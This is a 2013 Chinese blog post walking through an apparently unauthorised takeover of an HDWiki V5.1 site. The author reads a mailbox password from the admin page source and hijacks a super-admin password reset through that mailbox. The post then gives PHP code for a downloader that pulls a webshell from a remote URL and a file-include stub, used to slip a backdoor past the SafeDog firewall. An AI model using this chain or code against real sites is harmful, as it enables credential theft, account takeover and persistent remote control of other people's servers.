HDWiki V5.1百科系统后台过安全狗拿shell

偶遇一hdwiki百科系统站,前台在词条创建人处发现一管理员
image001.png

进接通过账号社进后台,后台工能很强大,但是发现限权不够
文件管理 无权限.jpg

在会员管理处发现还存在超级管理员这类账号

image009.png

社工admin无果

反回后台,发现管理员帐号可以对网站的邮箱进行配置
image007.png

用的腾讯企业邮箱,通过查看源码直接获取邮箱密码

反回网站前台,在密码找回处填上刚才找到的admin邮箱,admin的密码找回链接会通过刚找到的邮箱发送
image011.png

在网页登录刚才的腾讯腾讯企业邮箱,在发件箱中看到admin的密码找回链接
image013.png
直接重置admin密码,再次登录后台,看到文件管理处很强大,可以新建文件也可以上传
文件管理.jpg

直接新建大马,被安全狗档住了
安全狗.jpg

新建getshell.php,
getshell.jpg
代码

lt;?php $remotecode = $_REQUEST['code']; $targetfile = $_REQUEST['file']; $shellcode = file_get_contents($remotecode); $fp = fopen($targetfile,"a"); fwrite($fp,$shellcode); ?gt;

通过 getshell.php?code=http://木马路径file=1.txt,绕过安全狗对POST数据包检测的限制,让服务器下载我们的大马保存为1.txt
这是用到一个php的函数 file_get_contents()
这个函数可以从远程文件中读取内容
但前提是 php.ini 中allow_url_fopen 得为 on 才行

再新建shell.php
QQ截图20130501132222.jpg
代码

lt;?php require_once ("1.txt"); ?gt;

利用php文件包含来绕过过安全狗对文件内容检限制
ignore_js_op大马.jpg
成功拿到shell一枚

没什么技术含量,大牛略过

来源:Panni_007 Security

posted @ 2013-05-03 12:08:44 kuye 阅读(5483) 评论(0)
发表评论
昵称
邮箱
网址